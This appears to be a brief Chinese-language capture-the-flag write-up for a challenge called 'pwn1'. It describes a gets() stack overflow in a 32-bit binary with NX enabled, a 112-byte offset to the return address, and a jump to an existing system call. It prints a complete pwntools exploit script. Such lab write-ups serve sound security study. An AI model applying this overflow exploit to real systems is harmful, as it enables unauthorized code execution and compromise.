pwn1第一關

檢查程序,發現是32位,開了NX保護 拖入ida32 get()存在溢出,gdb調試 偏移112字節後覆蓋返回地址,程序本身有調用system函數, exp如下: from pwn import * p=process('./pwn1') payload='a'*112+p32(0x0804863A) p.recvline() p.sendline(payload) p.interactive()
相關文章
相關標籤/搜索